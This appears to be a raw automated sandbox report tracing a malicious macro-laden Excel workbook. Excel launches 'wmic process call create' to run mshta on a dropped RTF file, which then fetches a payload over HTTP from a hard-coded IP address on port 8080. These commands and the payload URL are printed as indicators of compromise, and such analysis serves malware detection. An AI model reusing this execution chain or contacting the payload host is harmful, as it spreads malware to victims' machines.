Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\wbem\WMIC.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080 |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080 |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080 |
Source: Joe Sandbox View |
IP Address: 157.230.250.107 157.230.250.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.230.250.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.230.250.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.230.250.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.230.250.107 |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107: |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8 |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:80 |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhor |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9 |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107ecz |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.10jeca |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.25ON |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.25TP.6W? |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://g.F |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: EXCEL.EXE, 00000000.00000002.676235965.0000000007620000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676332579.0000000007876000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676317726.0000000007816000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676303973.00000000077A6000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.open |
Source: EXCEL.EXE, 00000000.00000002.676235965.0000000007620000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.openformatrg/package/2006/content-t |
Source: EXCEL.EXE, 00000000.00000002.676332579.0000000007876000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676317726.0000000007816000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676303973.00000000077A6000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.openformatrg/package/2006/r |
Source: mshta.exe, 00000006.00000002.671944211.0000000003340000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: WMIC.exe, 00000003.00000002.540231820.0000000001BA0000.00000002.00020000.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: mshta.exe, 00000006.00000002.671944211.0000000003340000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: global traffic |
HTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: lubeHost: 157.230.250.107:8080 |
Source: Yara match |
File source: C:\ProgramData\vqcMnINBAOOJC.rtf, type: DROPPED |
Source: 56449657.xlsm |
Initial sample: Sheet name: Macro1 |
Source: EXCEL.EXE, 00000000.00000002.675909092.0000000005A24000.00000004.00000001.sdmp |
Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=GIGIYTFUSERNAME=userUSERPROFILE=C:\Users\userWecVersionForRosebud.6AC=4windir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.logs:dce |
|
Source: 56449657.xlsm |
Macro extractor: Sheet: Macro1 high usage of CHAR() function: 21 |
Source: 56449657.xlsm |
Macro extractor: Sheet name: Macro1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6743 |
0_2_024E6743 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6340 |
0_2_024E6340 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6753 |
0_2_024E6753 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E66E8 |
0_2_024E66E8 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E66F3 |
0_2_024E66F3 |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtf |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" |
Jump to behavior |
Source: C:\Windows\System32\wbem\WMIC.exe |
WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal80.troj.expl.evad.winXLSM@4/6@0/1 |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: 56449657.xlsm |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: 56449657.xlsm |
Initial sample: OLE zip file path = docProps/custom.xml |
Source: FC330000.0.dr |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: C:\Windows\System32\wbem\WMIC.exe |
WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create |
Source: unknown |
Process created: cmd line: vqcmninbaoojc.rtf |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: cmd line: vqcmninbaoojc.rtf |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wbem\WMIC.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wbem\WMIC.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Yara match |
File source: app.xml, type: SAMPLE |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: !Progman |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: Program Manager< |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |